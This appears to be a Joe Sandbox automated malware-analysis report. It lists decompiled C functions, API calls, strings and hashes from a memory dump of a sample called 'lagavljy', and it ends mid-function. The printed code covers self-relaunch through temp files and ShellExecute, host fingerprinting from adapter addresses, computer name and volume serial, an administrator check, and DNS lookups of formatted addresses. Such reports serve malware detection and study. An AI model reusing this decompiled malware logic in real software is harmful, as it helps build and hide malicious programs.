Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040E654, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x73b743e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

lstrcmpA.KERNEL32(73B743E8,00000000,?,73B743E0,00000000,?,00405EC1), ref: 0040E693
lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,73B743E0,00000000,?,00405EC1), ref: 0040E6E9
lstrcmpA.KERNEL32(?,00000008,?,73B743E0,00000000,?,00405EC1), ref: 0040E722

Strings

A, xrefs: 0040E6F9, 0040E6FE, 0040E739
A, xrefs: 0040E65F, 0040E666, 0040E6CF, 0040E731

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
String ID: A$ A
API String ID: 3343386518-686259309
Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F26D, Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00409145, Relevance: 7.6, APIs: 5, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}

0x00409145
0x00409166
0x00409174
0x0040917a
0x00409180
0x00409181
0x004091a9
0x004091b6
0x004091c9
0x004091d3
0x00000000
0x004091e1
0x004091ea

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
CharToOemA.USER32 ref: 00409174
wsprintfA.USER32 ref: 004091A9

Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
String ID:
API String ID: 3857584221-0
Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68

Uniqueness

Uniqueness Score: -1.00%

Function 00479395, Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 004793AF
GetModuleFileNameA.KERNEL32(00000000), ref: 004793B6
CharToOemA.USER32(?,?), ref: 004793C4
wsprintfA.USER32 ref: 004793F9

Part of subcall function 004792B4: GetTempPathA.KERNEL32(00000400,?), ref: 004792CB
Part of subcall function 004792B4: wsprintfA.USER32 ref: 00479339
Part of subcall function 004792B4: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0047935E
Part of subcall function 004792B4: lstrlen.KERNEL32(?,?,00000000), ref: 00479372
Part of subcall function 004792B4: WriteFile.KERNEL32(00000000,?,00000000), ref: 0047937D
Part of subcall function 004792B4: CloseHandle.KERNEL32(00000000), ref: 00479384

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00479431

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
String ID:
API String ID: 3857584221-0
Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
Instruction ID: 1768e91e2669661ff75d12f4286c728b1488374c7e2ee883f710dc5a0872bd1d
Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
Instruction Fuzzy Hash: 0C0192F69001187BDB20A7619D89FDF377CDB85701F0040A6BB49E2080EAB89AC58F74

Uniqueness

Uniqueness Score: -1.00%

Function 00402419, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}

APIs

lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467

Strings

localcfg, xrefs: 0040241F

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcmpi
String ID: localcfg
API String ID: 1808961391-1857712256
Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}

APIs

LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9

Strings

GetAdaptersAddresses, xrefs: 00401AE3
Iphlpapi.dll, xrefs: 00401ACC

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetAdaptersAddresses$Iphlpapi.dll
API String ID: 2574300362-1087626847
Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401C15
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51

Strings

localcfg, xrefs: 00401BE7
hi_id, xrefs: 00401BE5

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: hi_id$localcfg
API String ID: 2777991786-2393279970
Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5

Uniqueness

Uniqueness Score: -1.00%

Function 00406EDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0xffffffff
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0xffffffff
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
FreeSid.ADVAPI32(?), ref: 00406F3E

Strings

*p@, xrefs: 00406F1C, 00406F1F

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID: *p@
API String ID: 3429775523-2474123842
Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00402684, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000001), ref: 00402693
gethostbyname.WS2_32(00000001), ref: 0040269F

Strings

time_cfg, xrefs: 00402684
~s`ysps, xrefs: 00402693

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$~s`ysps
API String ID: 1594361348-2010419113
Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688

Uniqueness

Uniqueness Score: -1.00%

Function 004728D4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(u6A), ref: 004728E3
gethostbyname.WS2_32(u6A), ref: 004728EF

Strings

u6A, xrefs: 004728D5, 004728E2, 004728EE
time_cfg, xrefs: 004728D4

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$u6A
API String ID: 1594361348-1940331995
Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction ID: 0499b0f9f261aab28bd6b1025ad1c9c7f761a7057106d166d79d160cba276a71
Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction Fuzzy Hash: 81E08C306040119FC7509B28F848AC637A4EF0A330F158686F048C32A0C3B89CC19749

Uniqueness

Uniqueness Score: -1.00%

Function 0047D7B9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 7sleepCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0047D7BC
Sleep.KERNEL32(000003E8), ref: 0047D7C7
ExitProcess.KERNEL32 ref: 0047D7D3

Strings

ps, xrefs: 0047D7BC

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ExitProcessSleepclosesocket
String ID: ps
API String ID: 2012141568-3878219058
Opcode ID: a6f9f776857f4ecde53a678587fdf16408cfdffbb3d2d617deb71ab51d0e9a11
Instruction ID: 687bcf4ba6a4f6253718dd4074fa4ee5ca1a3041e020b118673d1cf17a61e77a
Opcode Fuzzy Hash: a6f9f776857f4ecde53a678587fdf16408cfdffbb3d2d617deb71ab51d0e9a11
Instruction Fuzzy Hash: CFC04830841208EBD7412BA6FC4DA8C3E69AB08706B20C2A4B10A940B1CAB40A808A29

Uniqueness

Uniqueness Score: -1.00%

Function 004769AC, Relevance: 6.2, APIs: 4, Instructions: 199COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(?,00000080), ref: 004769CE
SetFileAttributesA.KERNEL32(?,00000002), ref: 00476A0F
GetFileSize.KERNEL32(000000FF,00000000), ref: 00476A23
CloseHandle.KERNEL32(000000FF), ref: 00476BC1

Part of subcall function 0047EE7E: GetProcessHeap.KERNEL32(00000000,?,00000000,00471DB8,?), ref: 0047EE91
Part of subcall function 0047EE7E: HeapFree.KERNEL32(00000000), ref: 0047EE98

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: File$AttributesHeap$CloseFreeHandleProcessSize
String ID:
API String ID: 3384756699-0
Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
Instruction ID: 0d535306902e5c67e3391d4fc6ac3b9427e622ec069f641d1c878a355ab4b915
Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
Instruction Fuzzy Hash: 1271397180062DEFDF10CFA4CC849EEBBB9FB05354F1185AAE519E6290D7349E82DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401C5F, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}

APIs

wsprintfA.USER32 ref: 00401CE1
wsprintfA.USER32 ref: 00401D6B

Strings

%u.%u.%u.%u.%s, xrefs: 00401CDB, 00401D65
localcfg, xrefs: 00401C70

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %u.%u.%u.%u.%s$localcfg
API String ID: 2111968516-120809033
Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E095, Relevance: 6.1, APIs: 4, Instructions: 92
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
